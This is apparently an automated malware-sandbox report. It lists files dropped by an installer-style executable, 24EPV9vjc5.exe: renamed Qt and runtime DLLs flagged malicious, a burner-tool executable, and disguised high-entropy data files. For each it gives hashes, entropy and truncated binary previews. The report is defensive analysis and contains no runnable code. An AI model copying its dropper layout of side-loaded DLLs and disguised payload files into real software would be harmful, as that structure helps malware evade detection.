SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\wiggery.bmp

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	4567853
Entropy (8bit):	7.952114001019503
Encrypted:	false
SSDEEP:	98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
MD5:	30152DF1AEA607F1159EFEEAC2B8CED1
SHA1:	E290B0553638EE68EB68C1CCE1062C733906EC9B
SHA-256:	5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
SHA-512:	94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
Malicious:	false
Preview:	.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	1986
Entropy (8bit):	3.7259224395984756
Encrypted:	false
SSDEEP:	48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
MD5:	3DA2E442D7803E1DADC2E8D8F383B817
SHA1:	1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
SHA-256:	5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
SHA-512:	8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".H.e.b.e.p.h.r.e.n.i.a.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.4.6.b.b.f.d.e.-.2.e.2.c.-.4.5.c.e.-.9.b.b.b.-.9.a.5.3.3.c.5.3.c.d.8.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.8.A.C.9.6.A.5.B.-.2.5.D.4.-.4.2.0.7.-.A.A.1.4.-.9.6.4.D.F.4.7.4.3.F.D.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".F.l.o.t.s.a.m.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".A.p.p.V.T.e.m.p.l.a.t.e.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".3.1.6.4.1.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".3.1.6.4.1.6.". .I.n.s.t.a.l.l.e.d.S.i.z.e.=.".

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\Fondue.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	180800
Entropy (8bit):	5.521664858470418
Encrypted:	false
SSDEEP:	3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
MD5:	CA03420E7D92D1E8C8726615879FE50D
SHA1:	49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
SHA-256:	501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
SHA-512:	8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j....O...O...O..S../O...o..*O...o..,O...O..+O...O..N..LP..?O..om..=O...I../O...o../O..Rich.O..........PE..L....wCB...........!.........0......I..............[.................................M.................................../..d...........X.......................L... ................................................................................text...0........................... ..`.rdata..L_.......`..................@..@.data...l...........................@....rsrc...X...........................@..@.reloc........... ..................@..B.wCB`....wCBm....wCBw....wCB.....wCB.....wCB.....wCB.....wCB.....wCB.....wCB....^xCB............KERNEL32.dll.NTDLL.DLL.USER32.dll.GDI32.dll.WINSPOOL.DRV.comdlg32.dll.COMCTL32.dll.ADVAPI32.dll.SHELL32.dll.VERSION.dll.MSVCRT.dll..............................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtCore4.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtGui4.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtNetwork4.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtXml4.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953961612144461
Encrypted:	false
SSDEEP:	12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:	A147F46E2E1F315AA219482D645BEED9
SHA1:	073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:	2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:	690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\hypochondriac.xlsx

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	data
Category:	dropped
Size (bytes):	60283
Entropy (8bit):	4.569551839311306
Encrypted:	false
SSDEEP:	1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:	3620E2D48EB60EC875FB9262ABC87D2B
SHA1:	55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:	E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:	CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:	false
Preview:	.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcp100.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcr100.dll

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\wiggery.bmp

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	data
Category:	dropped
Size (bytes):	4567853
Entropy (8bit):	7.952114001019503
Encrypted:	false
SSDEEP:	98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
MD5:	30152DF1AEA607F1159EFEEAC2B8CED1
SHA1:	E290B0553638EE68EB68C1CCE1062C733906EC9B
SHA-256:	5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
SHA-512:	94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
Malicious:	false
Preview:	.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Download File

Process:	C:\Users\user\Desktop\24EPV9vjc5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15692672
Entropy (8bit):	7.995895236161738
Encrypted:	true
SSDEEP:	393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
MD5:	EC4072E1AE2A9316270E6AFD66235A97
SHA1:	EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
SHA-256:	C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
SHA-512:	80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................$:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...$:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995895236161738
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	24EPV9vjc5.exe
File size:	15'692'672 bytes
MD5:	ec4072e1ae2a9316270e6afd66235a97
SHA1:	ec499500172ca2cc76c5b30eca34fceb9bacce0d
SHA256:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99
SHA512:	80a87456a9b2ae9344f42a2f09f29b4cbcdbda61418270ef1baf11399c7e0fac0c6a95d51682ba6205db908b84e17d7c4a3ff78ebac3efec75f5298b56cbeb7a
SSDEEP:	393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
TLSH:	C1F63372A534403AE7F50173EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3253
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x42e2a6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
